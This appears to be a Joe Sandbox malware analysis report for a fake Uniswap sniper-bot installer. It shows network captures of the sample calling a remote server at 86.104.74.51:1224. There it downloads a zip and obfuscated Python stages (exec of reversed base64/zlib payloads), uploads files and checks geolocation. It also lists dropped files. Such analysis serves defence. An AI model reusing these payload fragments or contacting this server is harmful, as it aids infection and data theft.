DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll	GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
ADVAPI32.dll	AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 25, 2024 19:05:18.145729065 CET	192.168.2.4	1.1.1.1	0x44ba	Standard query (0)	cdnjs.cloudflare.com	A (IP address)	IN (0x0001)	false
Nov 25, 2024 19:05:21.832464933 CET	192.168.2.4	1.1.1.1	0x5b3b	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 25, 2024 19:07:40.474462986 CET	192.168.2.4	1.1.1.1	0x9170	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Nov 25, 2024 19:07:45.154402018 CET	192.168.2.4	1.1.1.1	0x591f	Standard query (0)	www.python.org	A (IP address)	IN (0x0001)	false

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 25, 2024 19:05:18.373846054 CET	1.1.1.1	192.168.2.4	0x44ba	No error (0)	cdnjs.cloudflare.com		104.17.24.14	A (IP address)	IN (0x0001)	false
Nov 25, 2024 19:05:18.373846054 CET	1.1.1.1	192.168.2.4	0x44ba	No error (0)	cdnjs.cloudflare.com		104.17.25.14	A (IP address)	IN (0x0001)	false
Nov 25, 2024 19:05:22.098751068 CET	1.1.1.1	192.168.2.4	0x5b3b	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 25, 2024 19:05:22.098751068 CET	1.1.1.1	192.168.2.4	0x5b3b	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 25, 2024 19:07:40.615830898 CET	1.1.1.1	192.168.2.4	0x9170	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Nov 25, 2024 19:07:45.297103882 CET	1.1.1.1	192.168.2.4	0x591f	No error (0)	www.python.org	dualstack.python.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 25, 2024 19:07:45.297103882 CET	1.1.1.1	192.168.2.4	0x591f	No error (0)	dualstack.python.map.fastly.net		151.101.192.223	A (IP address)	IN (0x0001)	false
Nov 25, 2024 19:07:45.297103882 CET	1.1.1.1	192.168.2.4	0x591f	No error (0)	dualstack.python.map.fastly.net		151.101.64.223	A (IP address)	IN (0x0001)	false
Nov 25, 2024 19:07:45.297103882 CET	1.1.1.1	192.168.2.4	0x591f	No error (0)	dualstack.python.map.fastly.net		151.101.0.223	A (IP address)	IN (0x0001)	false
Nov 25, 2024 19:07:45.297103882 CET	1.1.1.1	192.168.2.4	0x591f	No error (0)	dualstack.python.map.fastly.net		151.101.128.223	A (IP address)	IN (0x0001)	false

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 19:05:11.643915892 CET	86	OUT	GET /pdown HTTP/1.1 Host: 86.104.74.51:1224 User-Agent: curl/7.83.1 Accept: /
Nov 25, 2024 19:05:12.846961021 CET	1236	IN	HTTP/1.1 200 OK X-Powered-By: Express Access-Control-Allow-Origin: * Content-Disposition: attachment; filename="p.zip" Accept-Ranges: bytes Cache-Control: public, max-age=0 Last-Modified: Wed, 13 Sep 2023 07:44:46 GMT ETag: W/"3117874-18a8d7fee11" Content-Type: application/zip Content-Length: 51476596 Date: Mon, 25 Nov 2024 18:05:12 GMT Connection: keep-alive Keep-Alive: timeout=5 Data Raw: 50 4b 03 04 0a 00 00 00 00 00 24 80 d0 56 00 00 00 00 00 00 00 00 00 00 00 00 05 00 00 00 2e 70 79 70 2f 50 4b 03 04 0a 00 00 00 00 00 18 80 d0 56 00 00 00 00 00 00 00 00 00 00 00 00 0a 00 00 00 2e 70 79 70 2f 44 4c 4c 73 2f 50 4b 03 04 14 00 00 00 08 00 4f a1 86 55 75 bb 04 c8 68 22 14 00 60 83 34 00 1b 00 00 00 2e 70 79 70 2f 44 4c 4c 73 2f 6c 69 62 63 72 79 70 74 6f 2d 31 5f 31 2e 64 6c 6c ec bd 05 58 d5 4b d7 f7 bf 15 1b 75 63 8b 89 b2 55 6c 74 1b d8 62 c2 11 bb 1b bb 50 0c 54 8e dd b5 45 3d b6 1e bb bb 3b 41 c1 ee 0e 40 6c b1 c0 c6 7e bf 9f 0d 18 e7 7e ee e7 7f 3f ef f5 af f7 ba f6 ef ba fc 31 bf 3d 33 6b d6 5a 33 b3 66 cd 5a 6b c6 da 2d a6 19 ec 0c 06 43 22 fd fb fe dd 60 d8 63 88 7d 2a 1b fe af 1f 87 04 06 43 ea 9c fb 52 1b 76 24 3f 9b 6b 4f 02 af b3 b9 1a 75 ed d6 cf a9 77 5f df 2e 7d db f5 74 ea d0 ae 57 2f 5f 3f a7 f6 9d 9c fa f6 ef e5 d4 ad 97 53 b5 ba 0d 9d 7a fa 76 ec 54 24 55 aa 14 a6 38 18 b7 df dd 6d b7 78 e6 d4 e2 f1 ff 66 3f cf 56 3c 40 7f bf bf 9c 62 5e 68 fd 3b c9 3c c3 fa d7 62 [TRUNCATED] Data Ascii: PK$V.pyp/PKV.pyp/DLLs/PKOUuh"`4.pyp/DLLs/libcrypto-1_1.dllXKucUltbPTE=;A@l~~?1=3kZ3fZk-C"`c}*CRv$?kOuw_.}tW/_?SzvT$U8mxf?V<@b^h;<bc;z4<S?Qj^d]<oA]iTq\2CEmd0f6&G$0I?k.ae% RKv-j5!@Ce.aPYEw~}.ak0DD2}P,!"/_<gE^I`1:P{[X\$! "X,;\[l6hr_v`JXp(_CU.uUw7XrU<gx"wOa[9dpFCG8"7p6Dz,Iot.r&Cd;9"smL]U-Y";"W5`8PBx\Y.+rlsZZ&Tz\[zug/

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 19:05:11.649144888 CET	683	OUT	POST /uploads HTTP/1.1 host: 86.104.74.51:1224 content-type: multipart/form-data; boundary=--------------------------638837609524654576768723 content-length: 108326 Connection: close Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 36 33 38 38 33 37 36 30 39 35 32 34 36 35 34 35 37 36 37 36 38 37 32 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 79 70 65 22 0d 0a 0d 0a 37 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 36 33 38 38 33 37 36 30 39 35 32 34 36 35 34 35 37 36 37 36 38 37 32 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 69 64 22 0d 0a 0d 0a 37 30 32 5f 38 31 33 38 34 38 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 36 33 38 38 33 37 36 30 39 35 32 34 36 35 34 35 37 36 37 36 38 37 32 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 74 73 22 0d 0a 0d 0a 31 37 33 32 35 35 37 39 30 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ----------------------------638837609524654576768723Content-Disposition: form-data; name="type"7----------------------------638837609524654576768723Content-Disposition: form-data; name="hid"702_813848----------------------------638837609524654576768723Content-Disposition: form-data; name="uts"1732557909----------------------------638837609524654576768723Content-Disposition: form-data; name="multi_file"; filename="0_lst"Content-Type: application/octet-stream
Nov 25, 2024 19:05:13.599670887 CET	253	IN	HTTP/1.1 200 OK X-Powered-By: Express Access-Control-Allow-Origin: * Content-Type: application/json; charset=utf-8 Content-Length: 15 ETag: W/"f-NQVRlQfKHCoInEbhALgECMonhCE" Date: Mon, 25 Nov 2024 18:05:13 GMT Connection: close Data Raw: 7b 22 73 74 61 74 75 73 22 3a 74 72 75 65 7d Data Ascii: {"status":true}

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 19:07:34.043456078 CET	74	OUT	GET /client/7/702 HTTP/1.1 host: 86.104.74.51:1224 Connection: close
Nov 25, 2024 19:07:35.348270893 CET	1236	IN	HTTP/1.1 200 OK X-Powered-By: Express Access-Control-Allow-Origin: * Content-Disposition: attachment; filename="main7_702.py" Accept-Ranges: bytes Cache-Control: public, max-age=0 Last-Modified: Fri, 08 Nov 2024 09:05:08 GMT ETag: W/"13d7-1930b052d6a" Content-Type: application/octet-stream Content-Length: 5079 Date: Mon, 25 Nov 2024 18:07:35 GMT Connection: close Data Raw: 5f 20 3d 20 6c 61 6d 62 64 61 20 5f 5f 20 3a 20 5f 5f 69 6d 70 6f 72 74 5f 5f 28 27 7a 6c 69 62 27 29 2e 64 65 63 6f 6d 70 72 65 73 73 28 5f 5f 69 6d 70 6f 72 74 5f 5f 28 27 62 61 73 65 36 34 27 29 2e 62 36 34 64 65 63 6f 64 65 28 5f 5f 5b 3a 3a 2d 31 5d 29 29 3b 65 78 65 63 28 28 5f 29 28 62 27 3d 3d 67 30 68 39 7a 77 66 34 2f 2f 2f 39 54 78 70 73 6e 2f 65 6e 77 2b 38 6e 36 32 56 30 79 78 4d 76 30 2b 71 57 43 48 4f 58 32 34 76 70 74 36 77 76 71 55 57 42 61 4e 51 45 73 35 35 4c 72 7a 44 42 66 51 77 65 44 38 41 56 45 4d 59 52 4f 63 57 75 64 55 2f 74 61 32 71 41 68 62 71 39 2f 56 71 49 4a 53 39 48 76 73 2b 45 69 63 48 54 58 43 67 63 57 53 6f 58 49 57 47 37 4c 56 35 53 32 53 51 59 77 44 48 43 42 73 5a 4e 78 37 52 2f 72 4a 70 6a 79 50 68 66 57 78 61 5a 34 51 33 6c 74 32 4a 30 74 32 55 58 36 61 61 32 55 73 49 5a 44 72 54 47 66 69 65 33 6f 46 53 76 56 2f 4e 37 74 63 6b 78 74 6c 43 39 48 6f 63 45 31 44 38 55 4f 34 51 67 6a 41 55 75 66 35 57 7a 4b 6a 31 52 78 64 56 53 6e 72 6e 34 63 70 4f 39 32 66 58 43 68 [TRUNCATED] Data Ascii: _ = lambda __ : __import__('zlib').decompress(__import__('base64').b64decode(__[::-1]));exec((_)(b'==g0h9zwf4///9Txpsn/enw+8n62V0yxMv0+qWCHOX24vpt6wvqUWBaNQEs55LrzDBfQweD8AVEMYROcWudU/ta2qAhbq9/VqIJS9Hvs+EicHTXCgcWSoXIWG7LV5S2SQYwDHCBsZNx7R/rJpjyPhfWxaZ4Q3lt2J0t2UX6aa2UsIZDrTGfie3oFSvV/N7tckxtlC9HocE1D8UO4QgjAUuf5WzKj1RxdVSnrn4cpO92fXChUwCaqDSDmOvTm6KsRGjLuYaWA89jQJnLJyxa22Lao6XpkbzthASR1TV301UF1qdeghsbz/cYnWpPAu7oMIOVigUfdLqMObkyINf/iacLFaT7SwASTZiW1jh/z4fbW3EPKEraH1DyCxU95BwlGsZRziX1qoDJhJCKoieOUQzCfPoRcfia/IWZbvBsCBXEcZx+PZZst65PVrjoTL4gNHqrY9NmuK8sGWxhkPvNf5WhftL2PXaUvW5IfGpeOoqNYGg9vXu4ifkH07BWNEBhWmtwxvBHNADlVjbsMHg1LYvpvn4mvY8hY6AX8dbT/3Xwx0dmyNKQIzDj14LNBDwH34sjfS3tBPmorsAqcIckFH6BFyWlR6yciO9XRBaTu2t/fl2O6NCyZ+k/8/5dZ8MnY2msSTgO7793xJE5j8RJNgHvKtjN9Hbg2Z8+2x7dIBFlvmHceF0+dmcdu4p64MuaI2Q4NJH4dSVajp/jVVOP1Fz1B9vAaeHxlPx//EZ73zWe5axdNkGBEC

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 19:07:38.528772116 CET	161	OUT	GET /payload/7/702 HTTP/1.1 Host: 86.104.74.51:1224 User-Agent: python-requests/2.31.0 Accept-Encoding: gzip, deflate Accept: / Connection: keep-alive
Nov 25, 2024 19:07:39.835675955 CET	1236	IN	HTTP/1.1 200 OK X-Powered-By: Express Access-Control-Allow-Origin: * Content-Disposition: attachment; filename="pay7_702.py" Accept-Ranges: bytes Cache-Control: public, max-age=0 Last-Modified: Fri, 08 Nov 2024 09:02:37 GMT ETag: W/"488b-1930b02dfae" Content-Type: application/octet-stream Content-Length: 18571 Date: Mon, 25 Nov 2024 18:07:39 GMT Connection: keep-alive Keep-Alive: timeout=5 Data Raw: 5f 20 3d 20 6c 61 6d 62 64 61 20 5f 5f 20 3a 20 5f 5f 69 6d 70 6f 72 74 5f 5f 28 27 7a 6c 69 62 27 29 2e 64 65 63 6f 6d 70 72 65 73 73 28 5f 5f 69 6d 70 6f 72 74 5f 5f 28 27 62 61 73 65 36 34 27 29 2e 62 36 34 64 65 63 6f 64 65 28 5f 5f 5b 3a 3a 2d 31 5d 29 29 3b 65 78 65 63 28 28 5f 29 28 62 27 3d 59 54 78 6d 2b 33 41 2b 2f 2f 66 2f 73 49 30 67 72 50 58 39 30 58 33 37 34 4a 2b 41 4b 53 34 70 78 43 50 4c 65 74 32 2b 42 4b 70 75 6a 65 6e 64 49 37 51 75 45 4d 64 33 46 68 6f 72 7a 45 6c 41 66 6a 64 5a 56 47 46 51 34 6a 79 63 55 4a 52 31 44 35 53 6e 6f 67 32 38 71 75 32 59 71 42 69 38 46 68 4b 53 4c 50 31 38 42 43 76 2b 57 39 79 58 63 50 71 4c 51 72 45 75 79 36 6c 44 64 55 6f 4f 74 5a 6f 69 43 69 54 33 47 63 57 74 59 43 52 5a 6e 6b 79 55 79 4e 6a 6c 52 30 6f 58 56 4f 43 6d 33 32 63 6c 62 31 30 4b 74 2b 61 5a 6d 46 4e 6f 7a 74 34 46 32 43 63 53 5a 2f 73 31 72 75 49 6a 69 51 56 6b 63 61 30 51 66 32 75 67 61 52 58 6e 4b 43 45 34 56 76 36 4e 66 79 31 6e 50 4a 30 4d 67 6c 34 44 2b 6a 75 76 59 71 68 4b 48 38 [TRUNCATED] Data Ascii: _ = lambda __ : __import__('zlib').decompress(__import__('base64').b64decode(__[::-1]));exec((_)(b'=YTxm+3A+//f/sI0grPX90X374J+AKS4pxCPLet2+BKpujendI7QuEMd3FhorzElAfjdZVGFQ4jycUJR1D5Snog28qu2YqBi8FhKSLP18BCv+W9yXcPqLQrEuy6lDdUoOtZoiCiT3GcWtYCRZnkyUyNjlR0oXVOCm32clb10Kt+aZmFNozt4F2CcSZ/s1ruIjiQVkca0Qf2ugaRXnKCE4Vv6Nfy1nPJ0Mgl4D+juvYqhKH8kGHp65/w61kxeUTkY6qVpHAERa2otJOM3k73JTSSa2BDjw08i+a++V7DnkVYl7xCQk/kLzWOB2Dm64cPBkn0v/vs/N/qXD4BVR/LAdDyqY3lGzNvpbzUu6YjuyIjbZomcqt3KfmZsP7InOC+3Do035li/VGvdebHs+skSOA5Gtu83WNGSZmsLGxFaJRkbCqkXF9AGXmZzY8GDtmPF75rZu0Yu//VzKNbT/bZSOFCgSFSzB+Vbo+F8QAimyMEZML5jm+JA9kMF1dbhOgwOMfiqX+HPwqpTrNWNx6+ynpuazJsGG9+0gHuxoVz6ntOlPxrx5/IpDGOz6+SLblquqkZhtPSXkC+MMdtlKf79PekC4wD79g0aKbHOARshMsp422DcKxvkQOdPW9aPzb+xkw2SlBfip4QZ4vRi72XRUkPdHjbPobXhpqcDaio3gCrie2F/RkVIoXSsMg/9Yl8kUapXGEkEpbA+bKZKunyrnuZXA

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 19:07:40.187417984 CET	158	OUT	GET /brow/7/702 HTTP/1.1 Host: 86.104.74.51:1224 User-Agent: python-requests/2.31.0 Accept-Encoding: gzip, deflate Accept: / Connection: keep-alive
Nov 25, 2024 19:07:41.494820118 CET	1236	IN	HTTP/1.1 200 OK X-Powered-By: Express Access-Control-Allow-Origin: * Content-Disposition: attachment; filename="brow7_702.py" Accept-Ranges: bytes Cache-Control: public, max-age=0 Last-Modified: Fri, 08 Nov 2024 09:06:57 GMT ETag: W/"36a87-1930b06d640" Content-Type: application/octet-stream Content-Length: 223879 Date: Mon, 25 Nov 2024 18:07:41 GMT Connection: keep-alive Keep-Alive: timeout=5 Data Raw: 5f 20 3d 20 6c 61 6d 62 64 61 20 5f 5f 20 3a 20 5f 5f 69 6d 70 6f 72 74 5f 5f 28 27 7a 6c 69 62 27 29 2e 64 65 63 6f 6d 70 72 65 73 73 28 5f 5f 69 6d 70 6f 72 74 5f 5f 28 27 62 61 73 65 36 34 27 29 2e 62 36 34 64 65 63 6f 64 65 28 5f 5f 5b 3a 3a 2d 31 5d 29 29 3b 65 78 65 63 28 28 5f 29 28 62 27 4b 7a 66 48 56 44 77 2f 2f 2b 39 7a 79 33 36 57 2f 70 6b 48 64 46 57 36 49 69 43 67 77 6b 36 56 43 39 74 6a 66 46 70 52 56 6e 39 48 76 6e 74 78 4d 49 47 34 78 34 5a 70 45 68 74 4e 53 6a 59 36 62 78 50 69 33 53 76 34 64 59 35 64 5a 76 50 4c 79 30 7a 68 65 37 44 42 62 64 71 5a 64 65 55 4c 36 50 41 42 2b 65 57 72 42 54 63 2b 54 49 45 35 57 61 31 4e 33 45 50 37 4b 78 73 4e 4f 73 6b 74 2f 48 36 64 53 4f 78 72 4c 76 2b 58 74 58 49 38 64 6c 79 32 55 39 50 52 63 2b 4f 75 6d 6a 34 49 57 33 45 6e 51 2b 39 65 5a 64 78 59 6e 4f 70 31 62 68 76 66 48 5a 36 6f 74 64 74 39 35 38 4a 33 41 45 75 6a 4c 53 4e 76 6e 32 6f 50 54 46 33 46 45 56 37 64 76 5a 70 4b 38 34 51 5a 6e 47 78 32 73 6f 55 47 4a 59 4c 79 6c 33 6e 41 4e 56 76 [TRUNCATED] Data Ascii: _ = lambda __ : __import__('zlib').decompress(__import__('base64').b64decode(__[::-1]));exec((_)(b'KzfHVDw//+9zy36W/pkHdFW6IiCgwk6VC9tjfFpRVn9HvntxMIG4x4ZpEhtNSjY6bxPi3Sv4dY5dZvPLy0zhe7DBbdqZdeUL6PAB+eWrBTc+TIE5Wa1N3EP7KxsNOskt/H6dSOxrLv+XtXI8dly2U9PRc+Oumj4IW3EnQ+9eZdxYnOp1bhvfHZ6otdt958J3AEujLSNvn2oPTF3FEV7dvZpK84QZnGx2soUGJYLyl3nANVvDz+0+oG6zHKwozhwpJZd5npzMd4tr0x5uYPs42K1o2Qo/ilUop0OT5eCcZi3r2oQUxJ/tpNxY0FuxuApLwAU3vQvhC2IqC5Yz84f1ey0PEaCASmgIRS7DkADWeY3auR6U3DBgdQ2q/7gA5fp71LnVfpG5uQNXJHopIes0lmPm61Bux1lgkrLaZMOMSiH3hyw+17dbgd0lLjw5PBtxvxhOz5wY64BqVFJLj8jb9vnRSdxup4DODPnzF1C59Uq17eK7Sm8THpFGRRaU6tIC3461609KDcJfW3baRPjWTSnHqWVjlChTE/lQC4R+Vq/1x/hRuwWpSSeoj+dNk3EGYzlNNVmONyR8223u1th/rFZmM0xW6X1x1fBg1PfokxQVQdbD+hSuU3QfIb+teSd5T72QnLr4J2x4MTfHvyiBi0yYJ+m2g6L95XbmPF8HFzP7Hx/92OFhkRcMxOI3Yaq524SimMJOmzFvdtHoRDnkNT

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 19:07:40.746980906 CET	145	OUT	GET /json HTTP/1.1 Host: ip-api.com User-Agent: python-requests/2.31.0 Accept-Encoding: gzip, deflate Accept: / Connection: keep-alive
Nov 25, 2024 19:07:41.912158012 CET	482	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 18:07:41 GMT Content-Type: application/json; charset=utf-8 Content-Length: 305 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 37 35 22 7d Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.75"}

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report uniswap-sniper-bot-with-gui Setup 1.0.0.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\.n2\bow

C:\Users\user\.n2\mlip

C:\Users\user\.n2\pay

C:\Users\user\.pyp\DLLs\_asyncio.pyd

C:\Users\user\.pyp\DLLs\_bz2.pyd

C:\Users\user\.pyp\DLLs\_ctypes.pyd

C:\Users\user\.pyp\DLLs\_decimal.pyd

C:\Users\user\.pyp\DLLs\_elementtree.pyd

C:\Users\user\.pyp\DLLs\_hashlib.pyd

C:\Users\user\.pyp\DLLs\_lzma.pyd

C:\Users\user\.pyp\DLLs\_msi.pyd

C:\Users\user\.pyp\DLLs\_multiprocessing.pyd

C:\Users\user\.pyp\DLLs\_overlapped.pyd

C:\Users\user\.pyp\DLLs\_queue.pyd

C:\Users\user\.pyp\DLLs\_socket.pyd

C:\Users\user\.pyp\DLLs\_sqlite3.pyd

C:\Users\user\.pyp\DLLs\_ssl.pyd

C:\Users\user\.pyp\DLLs\_uuid.pyd

Windows Analysis Report
uniswap-sniper-bot-with-gui Setup 1.0.0.exe

C:\Users\user\.pyp\Lib\pycache\future.cpython-311.pyc (copy)

C:\Users\user\.pyp\Lib\pycache\future.cpython-311.pyc.1470121465360

C:\Users\user\.pyp\Lib\pycache\_compression.cpython-311.pyc (copy)

C:\Users\user\.pyp\Lib\pycache\_compression.cpython-311.pyc.1470160893744

C:\Users\user\.pyp\Lib\pycache\_weakrefset.cpython-311.pyc (copy)

C:\Users\user\.pyp\Lib\pycache\_weakrefset.cpython-311.pyc.1470113609440

C:\Users\user\.pyp\Lib\pycache\base64.cpython-311.pyc (copy)

C:\Users\user\.pyp\Lib\pycache\base64.cpython-311.pyc.1470109638912

C:\Users\user\.pyp\Lib\pycache\bisect.cpython-311.pyc (copy)

C:\Users\user\.pyp\Lib\pycache\bisect.cpython-311.pyc.1470131888944

C:\Users\user\.pyp\Lib\pycache\bz2.cpython-311.pyc (copy)

C:\Users\user\.pyp\Lib\pycache\bz2.cpython-311.pyc.1470161090384

C:\Users\user\.pyp\Lib\pycache\calendar.cpython-311.pyc (copy)

C:\Users\user\.pyp\Lib\pycache\calendar.cpython-311.pyc.1470131891408

C:\Users\user\.pyp\Lib\pycache\contextlib.cpython-311.pyc (copy)

C:\Users\user\.pyp\Lib\pycache\contextlib.cpython-311.pyc.1470121460992

C:\Users\user\.pyp\Lib\pycache\copy.cpython-311.pyc (copy)

C:\Users\user\.pyp\Lib\pycache\copy.cpython-311.pyc.1470159885504

C:\Users\user\.pyp\Lib\pycache\copyreg.cpython-311.pyc (copy)

C:\Users\user\.pyp\Lib\pycache\copyreg.cpython-311.pyc.1470113595664

C:\Users\user\.pyp\Lib\pycache\datetime.cpython-311.pyc (copy)

C:\Users\user\.pyp\Lib\pycache\datetime.cpython-311.pyc.1470131887936

C:\Users\user\.pyp\Lib\pycache\enum.cpython-311.pyc (copy)

C:\Users\user\.pyp\Lib\pycache\enum.cpython-311.pyc.1470109642384

C:\Users\user\.pyp\Lib\pycache\fnmatch.cpython-311.pyc (copy)

C:\Users\user\.pyp\Lib\pycache\fnmatch.cpython-311.pyc.1470161089376

C:\Users\user\.pyp\Lib\pycache\functools.cpython-311.pyc (copy)

C:\Users\user\.pyp\Lib\pycache\functools.cpython-311.pyc.1470109645968

C:\Users\user\.pyp\Lib\pycache\getpass.cpython-311.pyc (copy)

C:\Users\user\.pyp\Lib\pycache\getpass.cpython-311.pyc.2514769354336

C:\Users\user\.pyp\Lib\pycache\hashlib.cpython-311.pyc (copy)

C:\Users\user\.pyp\Lib\pycache\hashlib.cpython-311.pyc.1470133440160

C:\Users\user\.pyp\Lib\pycache\heapq.cpython-311.pyc (copy)

C:\Users\user\.pyp\Lib\pycache\heapq.cpython-311.pyc.1470133447216

C:\Users\user\.pyp\Lib\pycache\hmac.cpython-311.pyc (copy)

C:\Users\user\.pyp\Lib\pycache\hmac.cpython-311.pyc.1470133439376

C:\Users\user\.pyp\Lib\pycache\imp.cpython-311.pyc (copy)

C:\Users\user\.pyp\Lib\pycache\imp.cpython-311.pyc.1942764916384

C:\Users\user\.pyp\Lib\pycache\ipaddress.cpython-311.pyc (copy)

C:\Users\user\.pyp\Lib\pycache\ipaddress.cpython-311.pyc.1470133950752

C:\Users\user\.pyp\Lib\pycache\keyword.cpython-311.pyc (copy)

C:\Users\user\.pyp\Lib\pycache\keyword.cpython-311.pyc.1470113952160

C:\Users\user\.pyp\Lib\pycache\linecache.cpython-311.pyc (copy)

C:\Users\user\.pyp\Lib\pycache\linecache.cpython-311.pyc.1470122871248

C:\Users\user\.pyp\Lib\pycache\locale.cpython-311.pyc (copy)

C:\Users\user\.pyp\Lib\pycache\locale.cpython-311.pyc.1470113601264

C:\Users\user\.pyp\Lib\pycache\lzma.cpython-311.pyc (copy)

C:\Users\user\.pyp\Lib\pycache\lzma.cpython-311.pyc.1470161091728

C:\Users\user\.pyp\Lib\pycache\mimetypes.cpython-311.pyc (copy)

